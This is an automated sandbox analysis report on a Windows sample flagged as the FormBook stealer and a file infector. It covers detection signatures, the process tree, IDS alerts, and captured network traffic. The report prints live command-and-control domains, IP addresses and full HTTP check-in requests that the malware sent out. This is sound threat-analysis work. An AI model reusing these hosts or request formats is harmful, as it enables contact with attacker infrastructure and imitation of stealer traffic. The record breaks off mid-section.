Edit tour

Windows Analysis Report
uG3I84bQEr.exe

Overview

General Information

Sample name:	uG3I84bQEr.exe renamed because original name is a hash value
Original sample name:	fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af.exe
Analysis ID:	1588344
MD5:	22b40728c8fb1599479347ba89387ef4
SHA1:	7d951dd272c9b0b1e4295872d0004eb711f0eabb
SHA256:	fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af
Tags:	exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

uG3I84bQEr.exe (PID: 572 cmdline: "C:\Users\user\Desktop\uG3I84bQEr.exe" MD5: 22B40728C8FB1599479347BA89387EF4)

svchost.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\uG3I84bQEr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

bGPwjAWMEtES.exe (PID: 6748 cmdline: "C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

bitsadmin.exe (PID: 2360 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)

firefox.exe (PID: 5440 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

armsvc.exe (PID: 432 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: AB4B4378DE9DEF8797AA78370F33CFD7)

alg.exe (PID: 2096 cmdline: C:\Windows\System32\alg.exe MD5: EB607CDF7D5BB12D72F7C0C992646A55)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.svchost.exe.500000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.500000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Mozilla Firefox\firefox.exe, NewProcessName: C:\Program Files\Mozilla Firefox\firefox.exe, OriginalFileName: C:\Program Files\Mozilla Firefox\firefox.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 2360, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", ProcessId: 5440, ProcessName: firefox.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ParentImage: C:\Users\user\Desktop\uG3I84bQEr.exe, ParentProcessId: 572, ParentProcessName: uG3I84bQEr.exe, ProcessCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ProcessId: 6940, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ParentImage: C:\Users\user\Desktop\uG3I84bQEr.exe, ParentProcessId: 572, ParentProcessName: uG3I84bQEr.exe, ProcessCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ProcessId: 6940, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:00:38.246645+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49999	85.159.66.93	80	TCP
2025-01-11T01:01:27.071624+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49967	161.97.142.144	80	TCP
2025-01-11T01:01:51.123830+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49989	23.225.159.42	80	TCP
2025-01-11T01:02:25.653554+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49993	149.88.81.190	80	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:00:46.780676+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.6	49731	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:00:46.780676+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.6	49731	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:00:38.246645+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49999	85.159.66.93	80	TCP
2025-01-11T01:01:27.071624+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49967	161.97.142.144	80	TCP
2025-01-11T01:01:51.123830+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49989	23.225.159.42	80	TCP
2025-01-11T01:02:25.653554+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49993	149.88.81.190	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:01:43.249080+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49986	23.225.159.42	80	TCP
2025-01-11T01:01:46.014387+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49987	23.225.159.42	80	TCP
2025-01-11T01:01:48.545833+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49988	23.225.159.42	80	TCP
2025-01-11T01:01:58.155103+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49990	149.88.81.190	80	TCP
2025-01-11T01:02:00.703887+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49991	149.88.81.190	80	TCP
2025-01-11T01:02:03.249004+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49992	149.88.81.190	80	TCP
2025-01-11T01:02:32.295755+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49995	85.159.66.93	80	TCP
2025-01-11T01:02:34.860589+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49996	85.159.66.93	80	TCP
2025-01-11T01:02:37.623969+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49997	85.159.66.93	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:00:47.813054+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.6	49738	18.141.10.107	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: uG3I84bQEr.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.soainsaat.xyz/rum2/	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe	Avira: detection malicious, Label: W32/Infector.Gen

Multi AV Scanner detection for submitted file

Source: uG3I84bQEr.exe	ReversingLabs: Detection: 81%
Source: uG3I84bQEr.exe	Virustotal: Detection: 80%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: uG3I84bQEr.exe

Joe Sandbox ML: detected

Source: uG3I84bQEr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: uG3I84bQEr.exe, 00000000.00000003.2222768330.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source:	Binary string: ALG.pdbGCTL source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source:	Binary string: bitsadmin.pdb source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bGPwjAWMEtES.exe, 00000006.00000000.2420600558.0000000000DDE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49738 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 23.225.159.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49993 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49967 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 23.225.159.42:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49967 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49993 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 23.225.159.42:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49989 -> 23.225.159.42:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49989 -> 23.225.159.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 85.159.66.93:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.soainsaat.xyz

Source: Joe Sandbox View	IP Address: 149.88.81.190 149.88.81.190
Source: Joe Sandbox View	IP Address: 161.97.142.144 161.97.142.144
Source: Joe Sandbox View	IP Address: 161.97.142.144 161.97.142.144

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.6:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.6:49731

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /rq1s/?9V7X=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&WldT=UFzdV2kX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /rum2/?9V7X=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&WldT=UFzdV2kX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: www.nb-shenshi.buzz
Source: global traffic	DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic	DNS traffic detected: DNS query: www.xcvbj.asia
Source: global traffic	DNS traffic detected: DNS query: www.soainsaat.xyz

Source: unknown

HTTP traffic detected: POST /exqctojotladvua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808

Source: global traffic

